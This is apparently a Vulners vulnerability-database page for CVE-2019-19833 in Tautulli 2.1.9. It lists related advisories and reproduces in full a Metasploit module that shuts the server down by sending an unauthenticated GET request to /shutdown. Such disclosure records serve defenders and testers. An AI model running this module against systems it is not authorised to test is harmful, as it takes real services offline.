Lucene search
K

Tautulli 2.1.9 Denial Of Service

🗓️ 16 Jan 2020 00:00:00Reported by Ismail TasdelenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 132 Views

Tautulli v2.1.9 Shutdown Denial of Service via /shutdown URL, CVE-2019-19833, EDB-4778

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Tautulli 2.1.9 - Denial of Service Exploit
16 Jan 202000:00
zdt
GithubExploit
Exploit for Cross-Site Request Forgery (CSRF) in Tautulli
1 Jan 202600:39
githubexploit
Circl
CVE-2019-19833
19 Mar 202016:50
circl
CNVD
Tautulli Cross-Site Request Forgery Vulnerability
18 Dec 201900:00
cnvd
CVE
CVE-2019-19833
18 Dec 201917:08
cve
Cvelist
CVE-2019-19833
18 Dec 201917:08
cvelist
Exploit DB
Tautulli 2.1.9 - Denial of Service (Metasploit)
16 Jan 202000:00
exploitdb
exploitpack
Tautulli 2.1.9 - Denial of Service ( Metasploit )
16 Jan 202000:00
exploitpack
Metasploit
Tautulli v2.1.9 - Shutdown Denial of Service
17 Jan 202010:57
metasploit
NVD
CVE-2019-19833
18 Dec 201918:15
nvd
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize  
super(  
'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service',  
'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',  
'Author' => 'Ismail Tasdelen',  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2019-19833'],  
['EDB', '47785']  
]  
)  
register_options([ Opt::RPORT(8181) ])  
end  
  
def run  
res = send_request_raw({  
'method' => 'GET',  
'uri' => '/shutdown'  
})  
  
if res  
print_status("Request sent to #{rhost}")  
else  
print_status("No reply from #{rhost}")  
end  
rescue Errno::ECONNRESET  
print_status('Connection reset')  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jan 2020 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.56759
132